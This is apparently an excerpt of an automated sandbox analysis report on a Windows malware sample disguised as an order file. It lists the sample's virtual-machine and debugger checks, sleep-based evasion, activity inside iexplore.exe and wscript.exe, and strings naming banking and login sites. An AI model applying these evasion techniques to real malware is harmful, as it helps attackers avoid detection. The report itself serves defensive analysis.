                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\wscript.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLP
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAMEP
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeMemory allocated: 1DF34550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeMemory allocated: 1DF4DFC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sysJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0Jump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sysJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeFile opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sysJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032FD1C0 rdtsc 5_2_032FD1C0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8426Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1206Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow / User API: threadDelayed 9675Jump to behavior
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\wscript.exeAPI coverage: 3.1 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep count: 297 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep time: -594000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep count: 9675 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exe TID: 3292Thread sleep time: -19350000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe TID: 6036Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe TID: 6036Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe TID: 6036Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe TID: 6036Thread sleep time: -31000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 5760Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_0036C7A0 FindFirstFileW,FindNextFileW,FindClose,12_2_0036C7A0
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMUP
                Source: Amcache.hve.8.drBinary or memory string: VMware
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
                Source: 2361o4QI.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 2361o4QI.12.drBinary or memory string: global block list test formVMware20,11696428655
                Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: svchost.exe, 00000014.00000002.4501629386.0000028F71855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4501606551.0000028F7182C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4500154632.0000028F6C22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: 2361o4QI.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                Source: 2361o4QI.12.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 2361o4QI.12.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: 2361o4QI.12.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 2361o4QI.12.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
                Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREP
                Source: 2361o4QI.12.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 2361o4QI.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: 2361o4QI.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareP
                Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                Source: 2361o4QI.12.drBinary or memory string: discord.comVMware20,11696428655f
                Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
                Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: 2361o4QI.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 2361o4QI.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
                Source: tCyxXhRNgdPI.exe, 0000000D.00000002.4499007998.000000000062F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                Source: 2361o4QI.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: 2361o4QI.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 2361o4QI.12.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 2361o4QI.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIP
                Source: wscript.exe, 0000000C.00000002.4498888550.0000000000866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 2361o4QI.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 2361o4QI.12.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: firefox.exe, 0000001E.00000002.2665940294.00000257385EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{
                Source: 2361o4QI.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 2361o4QI.12.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
                Source: Amcache.hve.8.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                Source: 2361o4QI.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF364BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: 2361o4QI.12.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: 2361o4QI.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: 2361o4QI.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Nieuwebestellingen10122024.exe, 00000000.00000002.2163050689.000001DF35FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Nieuwebestellingen10122024.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_00417BA3 LdrLoadDll,5_2_00417BA3
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032AF32A mov eax, dword ptr fs:[00000030h]5_2_032AF32A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03277330 mov eax, dword ptr fs:[00000030h]5_2_03277330
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334132D mov eax, dword ptr fs:[00000030h]5_2_0334132D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032BA30B mov eax, dword ptr fs:[00000030h]5_2_032BA30B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327C310 mov ecx, dword ptr fs:[00000030h]5_2_0327C310
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A0310 mov ecx, dword ptr fs:[00000030h]5_2_032A0310
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330930B mov eax, dword ptr fs:[00000030h]5_2_0330930B
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0332437C mov eax, dword ptr fs:[00000030h]5_2_0332437C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333F367 mov eax, dword ptr fs:[00000030h]5_2_0333F367
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03287370 mov eax, dword ptr fs:[00000030h]5_2_03287370
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0334A352 mov eax, dword ptr fs:[00000030h]5_2_0334A352
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327D34C mov eax, dword ptr fs:[00000030h]5_2_0327D34C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327D34C mov eax, dword ptr fs:[00000030h]5_2_0327D34C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov eax, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov eax, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov eax, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov ecx, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov eax, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0330035C mov eax, dword ptr fs:[00000030h]5_2_0330035C
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03355341 mov eax, dword ptr fs:[00000030h]5_2_03355341
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279353 mov eax, dword ptr fs:[00000030h]5_2_03279353
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03279353 mov eax, dword ptr fs:[00000030h]5_2_03279353
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03302349 mov eax, dword ptr fs:[00000030h]5_2_03302349
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B33A0 mov eax, dword ptr fs:[00000030h]5_2_032B33A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B33A0 mov eax, dword ptr fs:[00000030h]5_2_032B33A0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A33A5 mov eax, dword ptr fs:[00000030h]5_2_032A33A5
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A438F mov eax, dword ptr fs:[00000030h]5_2_032A438F
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032A438F mov eax, dword ptr fs:[00000030h]5_2_032A438F
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0335539D mov eax, dword ptr fs:[00000030h]5_2_0335539D
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327E388 mov eax, dword ptr fs:[00000030h]5_2_0327E388
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327E388 mov eax, dword ptr fs:[00000030h]5_2_0327E388
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327E388 mov eax, dword ptr fs:[00000030h]5_2_0327E388
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03278397 mov eax, dword ptr fs:[00000030h]5_2_03278397
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03278397 mov eax, dword ptr fs:[00000030h]5_2_03278397
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03278397 mov eax, dword ptr fs:[00000030h]5_2_03278397
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032D739A mov eax, dword ptr fs:[00000030h]5_2_032D739A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032D739A mov eax, dword ptr fs:[00000030h]5_2_032D739A
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032903E9 mov eax, dword ptr fs:[00000030h]5_2_032903E9
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_033553FC mov eax, dword ptr fs:[00000030h]5_2_033553FC
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032B63FF mov eax, dword ptr fs:[00000030h]5_2_032B63FF
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333F3E6 mov eax, dword ptr fs:[00000030h]5_2_0333F3E6
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E3F0 mov eax, dword ptr fs:[00000030h]5_2_0329E3F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E3F0 mov eax, dword ptr fs:[00000030h]5_2_0329E3F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0329E3F0 mov eax, dword ptr fs:[00000030h]5_2_0329E3F0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333B3D0 mov ecx, dword ptr fs:[00000030h]5_2_0333B3D0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0328A3C0 mov eax, dword ptr fs:[00000030h]5_2_0328A3C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032883C0 mov eax, dword ptr fs:[00000030h]5_2_032883C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032883C0 mov eax, dword ptr fs:[00000030h]5_2_032883C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032883C0 mov eax, dword ptr fs:[00000030h]5_2_032883C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_032883C0 mov eax, dword ptr fs:[00000030h]5_2_032883C0
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0333C3CD mov eax, dword ptr fs:[00000030h]5_2_0333C3CD
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_03355227 mov eax, dword ptr fs:[00000030h]5_2_03355227
                Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 5_2_0327823B mov eax, dword ptr fs:[00000030h]5_2_0327823B
